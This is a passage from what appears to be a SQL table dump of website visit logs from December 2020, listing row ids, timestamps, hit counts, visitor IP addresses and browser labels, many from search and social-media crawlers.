249.70.47','chrome'),(548386,1607243846,1,1,0,0,'66.249.70.45','chrome'),(548387,1607244360,4,4,0,0,'18.134.129.38','chrome'),(548388,1607255890,1,1,0,0,'31.13.127.2','other'),(548389,1607255908,1,1,0,0,'31.13.127.24','other'),(548390,1607257441,1,1,0,0,'138.246.253.24','chrome'),(548391,1607267947,1,0,1,0,'66.249.70.43',''),(548392,1607270118,1,1,0,0,'69.171.251.28','other'),(548393,1607270141,1,1,0,0,'66.220.149.16','other'),(548394,1607274522,1,1,0,0,'46.133.157.195','chrome'),(548395,1607281947,1,1,0,0,'69.171.251.118','other'),(548396,1607283750,1,1,0,0,'66.220.149.30','other'),(548397,1607290278,1,1,0,0,'69.171.251.19','other'),(548398,1607293932,1,1,0,0,'69.171.251.5','other'),(548399,1607301907,1,1,0,0,'66.249.70.45','chrome'),(548400,1607307984,1,1,0,0,'104.131.172.56','other'),(548401,1607311679,1,0,1,0,'66.249.70.55',''),(548402,1607319190,1,1,0,0,'104.131.13.11','other'),(548403,1607323979,1,1,0,0,'69.171.251.22','other'),(548404,1607328919,1,1,0,0,'66.249.70.43','chrome'),(548405,1607334634,1,1,0,0,'31.13.127.12','other'),(548406,1607345751,1,1,0,0,'173.252.127.8','other'),(548407,1607347594,1,1,0,0,'91.196.178.75','chrome'),(548408,1607353725,1,1,0,0,'69.171.251.24','other'),(548409,1607354563,1,0,1,0,'66.249.70.43',''),(548410,1607397195,1,1,0,0,'31.13.115.113','other'),(548411,1607398113,1,0,1,0,'66.249.70.57',''),(548412,1607398933,1,1,0,0,'66.249.70.43','chrome'),(548413,1607411597,3,3,0,0,'176.37.90.125','other'),(548414,1607438622,1,1,0,0,'31.13.127.5','other'),(548415,1607442173,1,0,1,0,'66.249.70.45',''),(548416,1607449963,1,1,0,0,'69.171.251.9','other'),(548417,1607449966,1,1,0,0,'31.13.127.15','other'),(548418,1607450705,1,1,0,0,'69.171.251.30','other'),(548419,1607467328,1,1,0,0,'69.171.251.21','other'),(548420,1607485504,1,0,1,0,'66.249.70.43',''),(548421,1607518639,1,1,0,0,'173.252.95.117','other'),(548422,1607528618,1,0,1,0,'66.249.70.43',''),(548423,1607541042,1,1,0,0,'31.13.127.113','other'),(548424,1607541051,1,1,0,0,'31.13.127.23','other'),(548425,1607541054,1,1,0,0,'31.13.127.16','other'),(548426,1607541103,1,1,0,0,'31.13.127.18','other'),(548427,1607551870,1,0,1,0,'66.249.70.43',''),(548428,1607552051,1,1,0,0,'66.249.70.47','chrome'),(548429,1607564503,1,1,0,0,'66.249.70.47','chrome'),(548430,1607577277,1,0,1,0,'66.249.70.45',''),(548431,1607593300,1,1,0,0,'66.220.149.12','other'),(548432,1607608933,1,1,0,0,'173.252.95.8','other'),(548433,1607615577,1,0,1,0,'66.249.70.45',''),(548434,1607624293,1,1,0,0,'173.252.127.19','other'),(548435,1607629173,1,1,0,0,'37.53.123.250','chrome'),(548436,1607663674,1,0,1,0,'66.249.70.45',''),(548437,1607703774,1,0,1,0,'66.249.70.43',''),(548438,1607706704,1,1,0,0,'66.220.149.21','other'),(548439,1607714020,1,1,0,0,'178.133.217.150','chrome'),(548440,1607750095,1,0,1,0,'66.249.70.45',''),(548441,1607776266,1,0,1,0,'66.249.70.45',''),(548442,1607777392,1,1,0,0,'31.13.127.15','other'),(548443,1607779335,1,1,0,0,'31.13.127.118','other'),(548444,1607779352,1,1,0,0,'69.171.251.12','other'),(548445,1607802006,1,1,0,0,'173.252.111.116','other'),(548446,1607802007,1,1,0,0,'173.252.111.4','other'),(548447,1607806425,1,1,0,0,'69.171.251.2','other'),(548448,1607806438,1,1,0,0,'31.13.127.11','other'),(548449,1607806466,1,1,0,0,'173.252.111.24','other'),(548450,1607806536,1,1,0,0,'173.252.111.13','other'),(548452,1607806538,1,1,0,0,'66.220.149.3','other'),(548453,1607814815,1,1,0,0,'69.171.251.21','other'),(548454,1607821838,1,1,0,0,'138.246.253.24','chrome'),(548455,1607848719,1,1,0,0,'66.249.70.43','chrome'),(548456,1607859051,1,1,0,0,'173.252.127.20','other'),(548457,1607859847,1,1,0,0,'91.196.178.22','chrome'),(548458,1607862851,1,0,1,0,'66.249.70.45',''),(548459,1607864246,1,1,0,0,'31.13.127.21','other'),(548460,1607864290,1,1,0,0,'31.13.103.10','other'),(548461,1607867644,1,1,0,0,'66.220.149.14','other'),(548462,1607869145,1,1,0,0,'69.171.251.9','other'),(548463,1607869847,1,1,0,0,'69.171.251.26','other'),(548464,1607871427,1,1,0,0,'69.171.251.22','other'),(548465,1607871545,1,1,0,0,'31.13.127.14','other'),(548466,1607871556,1,1,0,0,'66.220.149.16','other'),(548467,1607873521,1,1,0,0,'173.252.127.120','other'),(548468,1607874963,1,1,0,0,'31.13.127.19','other'),(548469,1607874964,1,1,0,0,'31.13.127.1','other'),(548471,1607874988,1,1,0,0,'31.13.127.113','other'),(548472,1607877961,1,1,0,0,'69.171.251.33','other'),(548473,1607877976,1,1,0,0,'66.220.149.30','other'),(548474,1607878584,1,1,0,0,'173.252.95.27','other'),(548475,1607885050,3,3,0,0,'176.37.90.125','other'),(548476,1607886718,1,1,0,0,'138.246.253.24','chrome'),(548477,1607890268,1,1,0,0,'66.220.149.26','other'),(548478,1607896291,1,1,0,0,'69.171.251.113','other'),(548479,1607899318,1,1,0,0,'31.13.127.8','other'),(548480,1607899319,1,1,0,0,'31.13.127.117','other'),(548481,1607940817,1,1,0,0,'69.171.251.25','other'),(548482,1607940836,1,1,0,0,'31.13.127.14','other'),(548483,1607949119,1,0,1,0,'66.249.70.45',''),(548484,1607950396,1,1,0,0,'31.13.127.16','other'),(548485,1607950639,1,1,0,0,'91.196.177.241','chrome'),(548486,1607954711,1,1,0,0,'31.13.127.23','other'),(548487,1607957281,1,1,0,0,'31.13.103.24','other'),(548488,1607990157,1,1,0,0,'66.249.70.43','chrome'),(548489,1608035543,1,0,1,0,'66.249.70.45',''),(548490,1608056794,1,1,0,0,'91.196.178.4','chrome'),(548491,1608057697,1,1,0,0,'91.196.178.4','chrome'),(548492,1608058610,1,1,0,0,'173.252.111.19','other'),(548493,1608058611,1,1,0,0,'173.252.111.112','other'),(548495,1608058612,1,1,0,0,'173.252.111.118','other'),(548496,1608058614,1,1,0,0,'173.252.111.5','other'),(548497,1608058616,1,1,0,0,'173.252.111.16','other'),(548498,1608058620,1,1,0,0,'173.252.95.113','other'),(548499,1608058621,1,1,0,0,'173.252.111.15','other'),(548500,1608058622,1,1,0,0,'173.252.111.1','other'),(548501,1608058798,1,1,0,0,'91.220.61.240','chrome'),(548502,1608058814,1,1,0,0,'173.252.87.11','other'),(548503,1608058815,1,1,0,0,'173.252.87.120','other'),(548504,1608058828,1,1,0,0,'173.252.87.20','other'),(548505,1608058932,1,1,0,0,'91.196.178.4','chrome'),(548506,1608059506,1,1,0,0,'173.252.111.8','other'),(548507,1608059507,2,2,0,0,'173.252.111.9','other'),(548508,1608059508,1,1,0,0,'173.252.111.120','other'),(548509,1608059585,1,1,0,0,'176.227.247.103','chrome'),(548510,1608059598,2,2,0,0,'69.171.249.15','other'),(548511,1608059599,1,1,0,0,'69.171.249.112','other'),(548512,1608059633,1,1,0,0,'46.211.50.55','chrome'),(548513,1608059747,1,1,0,0,'66.220.149.24','other'),(548514,1608060059,1,1,0,0,'94.153.12.34','chrome'),(548515,1608060151,1,1,0,0,'105.157.102.229','chrome'),(548516,1608060305,1,1,0,0,'185.177.212.26','chrome'),(548517,1608060334,1,1,0,0,'66.220.149.25','other'),(548518,1608060352,1,1,0,0,'155.133.102.101','chrome'),(548519,1608060488,1,1,0,0,'91.196.178.4','chrome'),(548520,1608060779,1,1,0,0,'195.22.111.108','chrome'),(548521,1608060958,1,1,0,0,'173.252.127.36','other'),(548522,1608061005,1,1,0,0,'188.163.76.66','chrome'),(548523,1608061061,1,1,0,0,'80.6.103.128','chrome'),(548524,1608061350,1,1,0,0,'173.252.111.23','other'),(548525,1608061465,1,1,0,0,'91.196.178.4','chrome'),(548526,1608061661,1,1,0,0,'185.177.191.45','chrome'),(548527,1608061713,1,1,0,0,'46.211.26.136','chrome'),(548528,1608061992,1,1,0,0,'31.41.90.250','chrome'),(548529,1608062210,2,2,0,0,'46.211.45.3','chrome'),(548530,1608062800,1,1,0,0,'46.211.26.136','chrome'),(548531,1608063005,1,1,0,0,'194.44.176.42','chrome'),(548532,1608063883,1,1,0,0,'176.120.99.234','chrome'),(548533,1608064032,1,1,0,0,'91.220.61.246','chrome'),(548534,1608064134,1,1,0,0,'77.121.125.85','chrome'),(548535,1608064200,1,1,0,0,'93.170.116.107','chrome'),(548536,1608064567,1,1,0,0,'31.13.127.117','other'),(548537,1608064712,1,1,0,0,'128.124.20.94','chrome'),(548538,1608065325,1,1,0,0,'91.245.78.36','chrome'),(548539,1608065787,1,1,0,0,'5.58.147.244','chrome'),(548540,1608065905,1,1,0,0,'66.220.149.11','other'),(548541,1608065906,1,1,0,0,'66.220.149.22','other'),(548542,1608065907,1,1,0,0,'66.220.149.42','other'),(548543,1608066101,1,1,0,0,'46.133.87.234','chrome'),(548544,1608066120,1,1,0,0,'91.245.115.18','other'),(548545,1608066138,1,1,0,0,'69.171.249.9','other'),(548546,1608066216,1,1,0,0,'77.123.164.252','other'),(548547,1608066285,1,1,0,0,'31.13.115.7','other'),(548548,1608066953,1,1,0,0,'46.211.37.11','chrome'),(548549,1608067640,1,1,0,0,'188.191.73.23','other'),(548550,1608067678,1,1,0,0,'69.171.251.5','other'),(548551,1608067793,1,1,0,0,'195.135.244.210','chrome'),(548552,1608070733,1,1,0,0,'173.252.127.36','other'),(548553,1608070734,1,1,0,0,'173.252.127.112','other'),(548556,1608070983,1,1,0,0,'178.210.143.44','chrome'),(548557,1608071114,1,1,0,0,'176.107.181.209','chrome'),(548558,1608071380,1,1,0,0,'173.252.127.23','other'),(548559,1608073399,1,1,0,0,'188.163.114.109','chrome'),(548560,1608073512,1,1,0,0,'90.179.13.146','chrome'),(548561,1608074363,1,1,0,0,'5.173.168.187','chrome'),(548562,1608080810,1,1,0,0,'176.108.106.20','chrome'),(548563,1608083237,1,1,0,0,'176.124.135.32','chrome'),(548564,1608083629,1,1,0,0,'213.5.193.61','chrome'),(548565,1608089287,1,1,0,0,'194.44.90.97','chrome'),(548566,1608090883,1,1,0,0,'46.211.32.163','chrome'),(548567,1608093564,1,1,0,0,'173.252.83.6','other'),(548570,1608093565,1,1,0,0,'173.252.83.11','other'),(548573,1608093678,2,2,0,0,'91.196.178.4','chrome'),(548574,1608094553,1,1,0,0,'66.220.149.3','other'),(548575,1608095702,1,1,0,0,'173.252.83.18','other'),(548578,1608095703,1,1,0,0,'173.252.83.21','other'),(548579,1608095877,1,1,0,0,'195.114.121.177','chrome'),(548580,1608096301,1,1,0,0,'173.252.87.118','other'),(548581,1608098241,1,1,0,0,'69.171.251.10','other'),(548582,1608100214,1,1,0,0,'93.77.54.82','chrome'),(548583,1608101280,1,1,0,0,'193.19.254.254','chrome'),(548584,1608102717,1,1,0,0,'31.13.103.120','other'),(548585,1608102903,1,1,0,0,'173.252.95.116','other'),(548586,1608103086,1,1,0,0,'69.171.251.24','other'),(548587,1608103111,1,1,0,0,'91.196.178.75','chrome'),(548588,1608103659,1,1,0,0,'66.220.149.113','other'),(548589,1608104172,1,1,0,0,'176.125.47.88','other'),(548590,1608104204,1,1,0,0,'46.211.28.80','chrome'),(548591,1608105520,1,1,0,0,'69.171.251.28','other'),(548592,1608107836,1,1,0,0,'173.252.87.18','other'),(548593,1608109135,1,1,0,0,'66.220.149.22','other'),(548594,1608110621,1,1,0,0,'46.211.60.88','chrome'),(548595,1608110819,1,1,0,0,'46.211.47.85','chrome'),(548596,1608111731,1,1,0,0,'69.171.251.27','other'),(548597,1608113717,1,1,0,0,'46.175.190.28','chrome'),(548598,1608113747,1,1,0,0,'91.196.178.75','chrome'),(548599,1608114830,1,1,0,0,'91.196.178.75','chrome'),(548600,1608116050,1,1,0,0,'91.196.178.75','chrome'),(548601,1608118205,1,1,0,0,'185.212.251.250','chrome'),(548602,1608118788,1,1,0,0,'31.13.127.116','other'),(548603,1608121775,1,1,0,0,'173.252.83.21','other'),(548606,1608121878,1,1,0,0,'173.252.87.116','other'),(548607,1608121887,1,1,0,0,'173.252.87.4','other'),(548608,1608121916,1,0,1,0,'66.249.70.45',''),(548609,1608122240,1,1,0,0,'93.171.5.33','chrome'),(548610,1608123114,1,1,0,0,'91.196.178.75','chrome'),(548611,1608123213,1,1,0,0,'46.211.62.177','chrome'),(548612,1608123737,1,1,0,0,'194.44.105.253','chrome'),(548613,1608124099,1,1,0,0,'91.196.178.75','chrome'),(548614,1608124244,1,1,0,0,'5.53.119.178','chrome'),(548615,1608125066,1,1,0,0,'91.196.178.75','chrome'),(548616,1608126152,1,1,0,0,'128.124.232.175','chrome'),(548617,1608126412,1,1,0,0,'91.196.178.75','chrome'),(548618,1608126620,1,1,0,0,'31.13.127.26','other'),(548621,1608126621,1,1,0,0,'31.13.127.10','other'),(548625,1608126622,1,1,0,0,'31.13.127.11','other'),(548626,1608127467,1,1,0,0,'173.252.95.13','other'),(548627,1608127477,1,1,0,0,'91.222.113.227','chrome'),(548628,1608127795,1,1,0,0,'91.196.178.75','chrome'),(548629,1608128150,1,1,0,0,'185.138.231.194','chrome'),(548630,1608128699,1,1,0,0,'91.196.178.75','chrome'),(548631,1608128888,1,1,0,0,'46.211.36.232','chrome'),(548632,1608129597,1,1,0,0,'37.73.192.243','chrome'),(548633,1608131705,1,1,0,0,'185.79.101.3','chrome'),(548634,1608132371,1,1,0,0,'178.133.206.86','chrome'),(548635,1608132418,1,1,0,0,'88.155.24.181','chrome'),(548636,1608132728,1,1,0,0,'173.252.79.113','other'),(548637,1608132729,1,1,0,0,'173.252.79.112','other'),(548638,1608133324,1,1,0,0,'173.252.95.5','other'),(548639,1608133566,1,1,0,0,'46.211.24.218','chrome'),(548640,1608133958,1,1,0,0,'46.211.23.205','chrome'),(548641,1608135078,1,1,0,0,'31.40.182.252','chrome'),(548642,1608136674,1,1,0,0,'91.196.178.4','chrome'),(548643,1608136813,1,1,0,0,'213.174.1.18','chrome'),(548644,1608137064,1,1,0,0,'37.53.126.4','chrome'),(548645,1608137954,1,1,0,0,'173.252.127.119','other'),(548646,1608139661,1,1,0,0,'91.196.178.4','chrome'),(548647,1608140066,1,1,0,0,'146.120.168.156','chrome'),(548648,1608140370,1,1,0,0,'194.44.56.204','chrome'),(548649,1608141040,1,1,0,0,'128.124.45.44','chrome'),(548650,1608141073,1,1,0,0,'91.231.43.74','chrome'),(548651,1608141328,1,1,0,0,'94.179.208.90','chrome'),(548652,1608141373,1,1,0,0,'176.121.5.9','other'),(548653,1608143551,1,1,0,0,'94.153.14.164','chrome'),(548654,1608143927,1,1,0,0,'94.179.208.90','chrome'),(548655,1608144719,1,1,0,0,'193.19.254.77','chrome'),(548656,1608146517,1,1,0,0,'195.80.141.5','chrome'),(548657,1608147953,1,1,0,0,'188.163.15.186','chrome'),(548658,1608149446,1,1,0,0,'81.111.116.96','chrome'),(548659,1608150185,1,1,0,0,'46.211.56.223','chrome'),(548660,1608151143,1,1,0,0,'176.227.245.92','chrome'),(548661,1608151864,1,1,0,0,'66.220.149.16','other'),(548662,1608152090,1,1,0,0,'173.252.111.116','other'),(548663,1608152098,2,2,0,0,'173.252.111.12','other'),(548664,1608152100,1,1,0,0,'173.252.95.10','other'),(548665,1608152125,2,2,0,0,'173.252.111.1','other'),(548666,1608152142,1,1,0,0,'69.171.251.24','other'),(548667,1608152161,3,3,0,0,'173.252.111.112','other'),(548668,1608152172,3,3,0,0,'173.252.111.13','other'),(548669,1608152173,1,1,0,0,'173.252.111.111','other'),(548672,1608152321,1,1,0,0,'173.252.111.5','other'),(548673,1608152322,1,1,0,0,'173.252.111.9','other'),(548674,1608152989,1,1,0,0,'173.252.95.9','other'),(548675,1608152996,1,1,0,0,'173.252.111.6','other'),(548676,1608152997,1,1,0,0,'173.252.111.10','other'),(548677,1608153002,1,1,0,0,'94.179.208.90','chrome'),(548678,1608156086,1,1,0,0,'188.163.33.65','chrome'),(548679,1608160987,1,1,0,0,'157.245.91.33','firefox'),(548680,1608168542,1,1,0,0,'94.153.75.172','chrome'),(548681,1608180358,1,1,0,0,'66.220.149.112','other'),(548683,1608180869,1,1,0,0,'173.252.95.12','other'),(548684,1608187291,1,1,0,0,'91.196.178.75','chrome'),(548685,1608193481,1,1,0,0,'213.83.133.93','chrome'),(548686,1608200819,1,1,0,0,'91.196.178.75','chrome'),(548687,1608200857,3,3,0,0,'31.13.127.21','other'),(548688,1608200858,1,1,0,0,'31.13.127.15','other'),(548690,1608200866,1,1,0,0,'31.13.127.2','other'),(548691,1608200867,1,1,0,0,'31.13.127.8','other'),(548692,1608200868,1,1,0,0,'31.13.127.16','other'),(548693,1608200912,1,1,0,0,'91.222.67.70','chrome'),(548694,1608200918,1,1,0,0,'31.13.127.13','other'),(548695,1608202382,1,1,0,0,'37.73.211.146','chrome'),(548696,1608202407,1,1,0,0,'173.252.127.28','other'),(548697,1608202421,2,2,0,0,'91.196.177.46','chrome'),(548698,1608202484,1,1,0,0,'91.196.178.9','chrome'),(548699,1608203582,1,1,0,0,'173.252.79.14','other'),(548702,1608203583,1,1,0,0,'173.252.79.18','other'),(548703,1608205696,1,1,0,0,'195.43.70.231','chrome'),(548704,1608205849,1,1,0,0,'91.221.219.8','chrome'),(548705,1608207702,1,1,0,0,'94.153.22.249','chrome'),(548706,1608208501,1,1,0,0,'91.196.178.175','chrome'),(548707,1608208896,1,0,1,0,'66.249.70.47',''),(548708,1608209695,1,1,0,0,'91.196.178.75','chrome'),(548709,1608210720,1,1,0,0,'5.58.151.19','chrome'),(548710,1608216911,1,1,0,0,'128.124.45.62','chrome'),(548711,1608217093,1,1,0,0,'173.252.127.30','other'),(548712,1608217349,1,1,0,0,'31.13.127.19','other'),(548713,1608218087,1,1,0,0,'5.255.253.92','chrome'),(548714,1608218095,1,1,0,0,'5.255.253.87','chrome'),(548715,1608218551,1,1,0,0,'128.124.45.62','chrome'),(548716,1608220312,1,1,0,0,'193.56.150.70','chrome'),(548717,1608220525,2,2,0,0,'128.124.45.62','chrome'),(548718,1608224042,1,1,0,0,'91.196.178.4','chrome'),(548719,1608225271,2,2,0,0,'128.124.45.62','chrome'),(548720,1608226632,1,1,0,0,'138.246.253.24','chrome'),(548721,1608233738,1,1,0,0,'173.252.111.22','other'),(548722,1608233836,2,2,0,0,'176.120.100.9','firefox'),(548723,1608234735,1,1,0,0,'37.30.20.242','chrome'),(548724,1608234775,1,1,0,0,'66.220.149.117','other'),(548725,1608235013,1,1,0,0,'69.171.251.32','other'),(548726,1608235051,1,1,0,0,'107.180.88.41','firefox'),(548727,1608236487,1,1,0,0,'173.252.111.1','other'),(548728,1608237117,1,1,0,0,'178.159.231.124','chrome'),(548729,1608241378,1,1,0,0,'93.77.59.218','chrome'),(548730,1608264788,1,1,0,0,'173.252.107.118','other'),(548731,1608264789,1,1,0,0,'173.252.107.113','other'),(548732,1608266429,1,1,0,0,'46.133.197.164','chrome'),(548733,1608266674,1,1,0,0,'195.211.63.183','chrome'),(548734,1608268225,1,1,0,0,'69.171.251.2','other'),(548735,1608279510,1,1,0,0,'46.8.221.100','chrome'),(548736,1608279817,1,1,0,0,'173.252.107.9','other'),(548737,1608282529,1,1,0,0,'66.249.70.45','chrome'),(548738,1608284261,1,1,0,0,'69.171.251.119','other'),(548739,1608284819,1,1,0,0,'95.134.168.138','chrome'),(548740,1608287888,1,1,0,0,'88.155.111.48','chrome'),(548741,1608293786,1,1,0,0,'185.212.251.250','chrome'),(548742,1608294537,1,1,0,0,'31.13.127.6','other'),(548743,1608294538,1,1,0,0,'31.13.127.14','other'),(548745,1608295433,2,1,1,0,'66.249.70.45',''),(548746,1608295962,1,1,0,0,'66.249.70.43','chrome'),(548747,1608296198,1,1,0,0,'46.133.20.42','chrome'),(548748,1608299007,1,1,0,0,'66.249.73.39','chrome'),(548749,1608299237,1,1,0,0,'66.249.70.45','chrome'),(548750,1608299611,1,1,0,0,'66.249.70.43','chrome'),(548751,1608303160,1,1,0,0,'78.111.189.21','chrome'),(548752,1608308906,1,1,0,0,'69.171.251.1','other'),(548753,1608308962,1,1,0,0,'31.13.127.7','other'),(548754,1608308964,1,1,0,0,'69.171.251.28','other'),(548755,1608309018,1,1,0,0,'91.196.178.180','chrome'),(548756,1608309337,1,1,0,0,'69.171.251.17','other'),(548757,1608313085,1,1,0,0,'5.58.151.19','chrome'),(548758,1608315983,1,1,0,0,'173.252.111.3','other'),(548759,1608318753,1,1,0,0,'91.196.178.4','chrome'),(548760,1608320136,1,1,0,0,'69.171.251.6','other'),(548761,1608325189,1,1,0,0,'94.153.25.111','chrome'),(548762,1608341780,1,1,0,0,'66.249.70.47','chrome'),(548763,1608354964,1,1,0,0,'66.249.70.45','chrome'),(548764,1608363002,1,1,0,0,'31.13.127.9','other'),(548765,1608371341,2,2,0,0,'173.252.111.13','other'),(548767,1608371342,1,1,0,0,'173.252.111.22','other'),(548768,1608373110,1,0,1,0,'66.249.70.45',''),(548769,1608374849,1,1,0,0,'69.171.251.3','other'),(548770,1608374867,1,1,0,0,'173.252.95.18','other'),(548771,1608379689,1,1,0,0,'66.220.149.116','chrome'),(548772,1608381219,1,0,1,0,'66.249.70.43',''),(548773,1608386107,1,1,0,0,'95.47.102.149','chrome'),(548774,1608391682,1,1,0,0,'66.249.70.45','chrome'),(548775,1608395597,1,0,1,0,'66.249.66.92',''),(548776,1608408990,1,1,0,0,'176.227.245.73','chrome'),(548777,1608414021,2,2,0,0,'91.196.178.66','chrome'),(548778,1608425932,1,1,0,0,'66.249.70.47','chrome'),(548779,1608431223,1,0,1,0,'66.249.70.43',''),(548780,1608451212,1,1,0,0,'37.73.96.144','chrome'),(548781,1608467762,1,0,1,0,'66.249.70.47',''),(548782,1608469744,1,1,0,0,'85.193.111.51','chrome'),(548783,1608475762,1,1,0,0,'66.220.149.21','other'),(548784,1608475763,1,1,0,0,'173.252.95.119','other'),(548785,1608482782,1,1,0,0,'45.131.164.2','other'),(548786,1608482926,1,1,0,0,'194.44.201.156','chrome'),(548787,1608490132,1,1,0,0,'66.220.149.119','other'),(548789,1608494719,1,1,0,0,'138.246.253.24','chrome'),(548790,1608535219,1,1,0,0,'91.196.178.66','chrome'),(548791,1608545112,1,1,0,0,'91.196.178.66','chrome'),(548792,1608554208,1,0,1,0,'66.249.70.45',''),(548793,1608554570,1,1,0,0,'173.252.95.21','other'),(548794,1608554734,1,1,0,0,'31.13.115.13','other'),(548795,1608554735,1,1,0,0,'31.13.115.5','other'),(548796,1608563246,2,2,0,0,'91.196.178.66','chrome'),(548797,1608563456,2,2,0,0,'31.13.127.17','other'),(548798,1608563457,1,1,0,0,'31.13.127.13','other'),(548800,1608563460,1,1,0,0,'31.13.127.16','other'),(548801,1608563461,1,1,0,0,'31.13.127.14','other'),(548803,1608563463,1,1,0,0,'31.13.127.19','other'),(548804,1608563464,1,1,0,0,'31.13.127.24','other'),(548805,1608563465,1,1,0,0,'31.13.127.117','other'),(548806,1608563466,1,1,0,0,'31.13.127.2','other'),(548807,1608563488,1,1,0,0,'185.237.217.15','chrome'),(548808,1608563611,1,1,0,0,'31.13.103.3','other'),(548809,1608563616,1,1,0,0,'173.252.95.25','other'),(548810,1608563642,1,1,0,0,'37.53.225.189','chrome'),(548811,1608563676,1,1,0,0,'69.171.251.27','other'),(548812,1608563823,1,1,0,0,'178.133.45.16','chrome'),(548813,1608563889,1,1,0,0,'88.155.127.223','chrome'),(548814,1608564099,1,1,0,0,'185.237.217.18','chrome'),(548815,1608564127,1,1,0,0,'46.211.66.46','chrome'),(548816,1608564128,1,1,0,0,'94.153.74.182','chrome'),(548817,1608564189,1,1,0,0,'91.196.178.61','chrome'),(548818,1608564209,1,1,0,0,'94.153.52.57','chrome'),(548819,1608564385,1,1,0,0,'178.92.249.185','chrome'),(548820,1608564389,1,1,0,0,'46.133.224.179','chrome'),(548821,1608564405,1,1,0,0,'31.13.103.7','other'),(548822,1608564407,1,1,0,0,'173.252.95.11','other'),(548823,1608564446,1,1,0,0,'80.64.92.142','chrome'),(548824,1608564552,1,1,0,0,'185.237.217.22','chrome'),(548825,1608564575,1,1,0,0,'46.211.73.41','chrome'),(548826,1608564604,1,1,0,0,'46.211.22.66','chrome'),(548827,1608564631,1,1,0,0,'66.220.149.22','other'),(548828,1608564632,1,1,0,0,'69.171.251.120','other'),(548829,1608564718,1,1,0,0,'91.196.178.164','chrome'),(548830,1608564773,1,1,0,0,'91.196.178.50','chrome'),(548831,1608564840,1,1,0,0,'31.13.127.5','other'),(548832,1608564953,1,1,0,0,'91.196.178.11','chrome'),(548833,1608564996,2,2,0,0,'91.196.178.157','other'),(548834,1608565037,1,1,0,0,'31.13.127.4','other'),(548836,1608565316,1,1,0,0,'94.153.5.55','chrome'),(548837,1608565414,1,1,0,0,'69.171.251.25','other'),(548839,1608565476,1,1,0,0,'91.196.178.91','chrome'),(548840,1608565516,1,1,0,0,'31.13.127.6','other'),(548841,1608565899,1,1,0,0,'185.237.217.11','chrome'),(548842,1608566150,1,1,0,0,'94.45.54.54','chrome'),(548843,1608566210,1,1,0,0,'91.196.178.138','chrome'),(548844,1608566352,1,1,0,0,'91.196.178.140','chrome'),(548845,1608566575,1,1,0,0,'91.196.178.181','chrome'),(548846,1608566584,1,1,0,0,'91.196.178.21','chrome'),(548847,1608566596,1,1,0,0,'31.13.127.119','other'),(548848,1608566638,1,1,0,0,'91.196.178.11','chrome'),(548849,1608566666,1,1,0,0,'185.237.217.12','chrome'),(548850,1608566699,1,1,0,0,'37.73.142.141','chrome'),(548851,1608566896,1,1,0,0,'46.211.89.80','chrome'),(548852,1608567131,1,1,0,0,'195.10.210.70','chrome'),(548853,1608567339,1,1,0,0,'66.220.149.11','other'),(548855,1608567368,1,1,0,0,'193.165.158.110','other'),(548856,1608567392,1,1,0,0,'91.196.178.60','chrome'),(548857,1608567398,1,1,0,0,'91.196.178.172','other'),(548858,1608567481,1,1,0,0,'69.171.251.13','other'),(548859,1608567505,1,1,0,0,'185.237.217.30','chrome'),(548860,1608567526,1,1,0,0,'31.13.115.15','other'),(548861,1608567532,1,1,0,0,'91.196.178.2','chrome'),(548862,1608567550,2,2,0,0,'69.171.251.19','other'),(548863,1608567619,1,1,0,0,'31.13.127.120','other'),(548864,1608567680,1,1,0,0,'91.196.178.115','chrome'),(548865,1608567695,1,1,0,0,'94.153.1.115','chrome'),(548866,1608567821,1,1,0,0,'91.196.178.170','other'),(548867,1608567837,1,1,0,0,'185.237.217.11','chrome'),(548868,1608567864,1,1,0,0,'178.133.85.24','chrome'),(548869,1608567919,1,1,0,0,'31.13.127.19','other'),(548870,1608567938,1,1,0,0,'185.237.217.15','chrome'),(548871,1608567970,1,1,0,0,'46.211.79.14','chrome'),(548872,1608567993,1,1,0,0,'37.52.16.176','chrome'),(548873,1608568021,1,1,0,0,'91.196.178.166','chrome'),(548874,1608568142,1,1,0,0,'69.171.251.31','other'),(548875,1608568191,1,1,0,0,'128.124.194.158','chrome'),(548876,1608568256,1,1,0,0,'69.171.251.8','other'),(548877,1608568257,1,1,0,0,'66.220.149.31','other'),(548878,1608568322,1,1,0,0,'195.10.210.210','chrome'),(548879,1608568330,1,1,0,0,'91.196.178.60','other'),(548880,1608568397,1,1,0,0,'77.75.149.58','chrome'),(548881,1608568418,1,1,0,0,'46.133.34.213','chrome'),(548882,1608568420,1,1,0,0,'91.196.178.33','chrome'),(548883,1608568471,1,1,0,0,'94.153.86.104','chrome'),(548884,1608568488,1,1,0,0,'91.196.178.186','chrome'),(548885,1608568507,1,1,0,0,'185.237.217.20','chrome'),(548886,1608568516,1,1,0,0,'91.196.178.123','chrome'),(548887,1608568539,1,1,0,0,'91.196.178.164','chrome'),(548888,1608568544,1,1,0,0,'172.58.139.43','chrome'),(548889,1608568604,1,1,0,0,'91.196.122.2','chrome'),(548890,1608568676,1,1,0,0,'91.196.178.39','chrome'),(548891,1608568697,1,1,0,0,'31.13.127.11','other'),(548892,1608568701,1,1,0,0,'37.55.227.131','chrome'),(548893,1608568730,1,1,0,0,'91.196.121.134','chrome'),(548894,1608568734,1,1,0,0,'91.223.88.207','chrome'),(548895,1608568775,2,2,0,0,'91.196.178.163','chrome'),(548896,1608568883,1,1,0,0,'91.196.178.188','chrome'),(548897,1608568914,1,1,0,0,'91.196.178.12','chrome'),(548898,1608568960,1,1,0,0,'91.210.248.112','chrome'),(548899,1608569007,1,1,0,0,'185.237.217.11','chrome'),(548900,1608569043,1,1,0,0,'173.252.95.26','other'),(548901,1608569089,1,0,1,0,'66.249.70.43',''),(548902,1608569171,1,1,0,0,'185.237.217.26','chrome'),(548903,1608569279,1,1,0,0,'37.73.177.44','chrome'),(548904,1608569532,1,1,0,0,'91.196.178.100','chrome'),(548905,1608569561,1,1,0,0,'91.196.178.186','chrome'),(548906,1608569770,1,1,0,0,'91.196.177.145','chrome'),(548907,1608569834,1,1,0,0,'91.196.121.134','chrome'),(548908,1608569846,1,1,0,0,'46.211.91.238','chrome'),(548909,1608569868,1,1,0,0,'31.13.127.20','other'),(548910,1608569940,1,1,0,0,'91.196.178.108','chrome'),(548911,1608569972,1,1,0,0,'185.237.217.10','chrome'),(548912,1608570002,1,1,0,0,'91.196.178.134','chrome'),(548913,1608570234,1,1,0,0,'46.229.60.92','chrome'),(548914,1608570311,1,1,0,0,'91.196.178.88','chrome'),(548915,1608570351,1,1,0,0,'91.196.178.173','chrome'),(548916,1608570408,1,1,0,0,'37.55.226.231','chrome'),(548917,1608570448,1,1,0,0,'87.178.165.213','chrome'),(548918,1608570564,1,1,0